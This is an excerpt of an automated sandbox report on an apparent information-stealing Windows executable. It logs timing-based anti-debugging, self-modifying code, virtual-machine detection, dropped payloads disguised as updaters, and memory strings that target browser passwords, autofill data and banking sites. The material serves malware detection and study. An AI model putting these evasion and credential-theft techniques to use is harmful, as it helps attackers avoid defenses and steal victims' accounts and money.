                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB06B1 second address: 0000000004DB0723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7E95375D07h 0x00000011 and cl, FFFFFFBEh 0x00000014 jmp 00007F7E95375D09h 0x00000019 popfd 0x0000001a mov bh, ah 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F7E95375D04h 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0723 second address: 0000000004DB0728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0728 second address: 0000000004DB0743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, dl 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0743 second address: 0000000004DB079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64ABh 0x00000009 jmp 00007F7E954D64B3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F7E954D64B8h 0x00000015 and si, 2BD8h 0x0000001a jmp 00007F7E954D64ABh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov si, C2A1h 0x0000002b mov edi, ecx 0x0000002d popad 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB079E second address: 0000000004DB07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E95375D00h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB07CA second address: 0000000004DB07CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB07CE second address: 0000000004DB07D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB07D4 second address: 0000000004DB0816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64ACh 0x00000009 add ah, FFFFFFC8h 0x0000000c jmp 00007F7E954D64ABh 0x00000011 popfd 0x00000012 call 00007F7E954D64B8h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0816 second address: 0000000004DB081A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB081A second address: 0000000004DB081E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB081E second address: 0000000004DB0824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0824 second address: 0000000004DB082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB082A second address: 0000000004DB082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB082E second address: 0000000004DB084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E954D64AFh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB084A second address: 0000000004DB08E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 push ecx 0x00000012 pop ebx 0x00000013 popad 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 mov dword ptr [esp+24h], 00000000h 0x00000020 jmp 00007F7E95375CFCh 0x00000025 lock bts dword ptr [edi], 00000000h 0x0000002a pushad 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F7E95375CFAh 0x00000034 sub cx, A478h 0x00000039 jmp 00007F7E95375CFBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov di, cx 0x00000043 popad 0x00000044 jc 00007F7F07917875h 0x0000004a pushad 0x0000004b call 00007F7E95375D00h 0x00000050 pop edi 0x00000051 popad 0x00000052 pop edi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F7E95375D06h 0x0000005a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB08E6 second address: 0000000004DB08EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB08EC second address: 0000000004DB090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E95375CFDh 0x00000013 rdtsc
                          Tries to evade debugger and weak emulator (self modifying code)
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSpecial instruction interceptor: First address: 000000000016F9B8 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSpecial instruction interceptor: First address: 000000000016F93F instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSpecial instruction interceptor: First address: 000000000031BB93 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSpecial instruction interceptor: First address: 000000000016F906 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSpecial instruction interceptor: First address: 00000000003A4775 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 0000000000B2F9B8 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 0000000000B2F93F instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 0000000000CDBB93 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 0000000000B2F906 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 0000000000D64775 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 000000000048F9B8 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 000000000048F93F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 000000000063BB93 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 000000000048F906 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 00000000006C4775 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSpecial instruction interceptor: First address: 000000000108582D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSpecial instruction interceptor: First address: 00000000010ADACF instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSpecial instruction interceptor: First address: 0000000000EEBCB5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSpecial instruction interceptor: First address: 00000000011099BD instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSpecial instruction interceptor: First address: 00000000010F582D instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSpecial instruction interceptor: First address: 000000000111DACF instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSpecial instruction interceptor: First address: 0000000000F5BCB5 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSpecial instruction interceptor: First address: 00000000011799BD instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_04D10D98 rdtsc 0_2_04D10D98
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 2591Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1635Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 2581Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 2239Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 391
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1090
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1155
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 963
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1256
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 920
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1183
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeWindow / User API: threadDelayed 4810
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\plaza[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\niks[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\ZLGJz1zjooaGjpiGIhT0.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\plaza[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\zs1nXDHCjbiIGotgg4qJ.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\well[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\HgvXSle13lm2R30FoCuW.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UdgmfEtw7ukqXx7vdO3L.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\ZUEHnz5YzDsyCHbnegZs.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\well[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\yk50FvD1XOCg2Y2iAkjB.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\fkGORKNF0MOvzFIhlS3N.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\well[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ladas[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UP_uKSEYzgg0BHrTE9Qz.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\dZPbe9okQutRw6uffMvo.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\niks[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\IK6nP7Vsyy6xQfngv8hq.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\RhvHlFoQ86AMGIsTANJB.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\1tu3JEnOc1WEcDVr1Q0N.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ladas[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-70046
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 3184Thread sleep time: -44022s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5412Thread sleep time: -40000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5700Thread sleep time: -46023s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 3004Thread sleep time: -30015s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5672Thread sleep time: -56028s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 4600Thread sleep time: -50025s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5676Thread sleep time: -46023s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5740Thread sleep count: 44 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5740Thread sleep time: -88044s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6052Thread sleep count: 2591 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6052Thread sleep time: -5184591s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5896Thread sleep count: 1635 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5896Thread sleep time: -3271635s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3236Thread sleep time: -52000s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6048Thread sleep count: 60 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6048Thread sleep time: -120060s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2976Thread sleep count: 205 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2976Thread sleep time: -410205s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5476Thread sleep count: 184 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5476Thread sleep time: -368184s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5920Thread sleep count: 2581 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5920Thread sleep time: -5164581s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5980Thread sleep count: 2239 > 30Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5980Thread sleep time: -4480239s >= -30000sJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1056Thread sleep count: 284 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1056Thread sleep time: -568284s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3516Thread sleep count: 391 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3516Thread sleep time: -782391s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6332Thread sleep time: -52000s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4920Thread sleep count: 1090 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4920Thread sleep time: -2181090s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3504Thread sleep count: 1155 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3504Thread sleep time: -2311155s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4924Thread sleep count: 963 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4924Thread sleep time: -1926963s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5028Thread sleep count: 1256 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5028Thread sleep time: -2513256s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6452Thread sleep count: 920 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6452Thread sleep time: -1840920s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7092Thread sleep count: 1183 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7092Thread sleep time: -2367183s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe TID: 1668Thread sleep time: -48100s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeThread sleep count: Count: 4810 delay: -10
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0003C050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,0_2_0003C050
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010B4E5 recv,FindFirstFileExW,0_2_0010B4E5
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009FC050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,6_2_009FC050
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00ACB4E5 recv,FindFirstFileExW,6_2_00ACB4E5
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData\Local
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData\Local\Temp
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nickname.utiitsl.comVMware20,1169648755
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT name, value FROM autofillmain'.sqlite_masterr global passwords blocklistVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: billing_address_id.comVMware20,11696487
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r global passwords blocklistVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra Change Transaction PasswordVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116x
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696
                          Source: RageMP131.exe, 0000000F.00000003.2394193590.00000000010B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
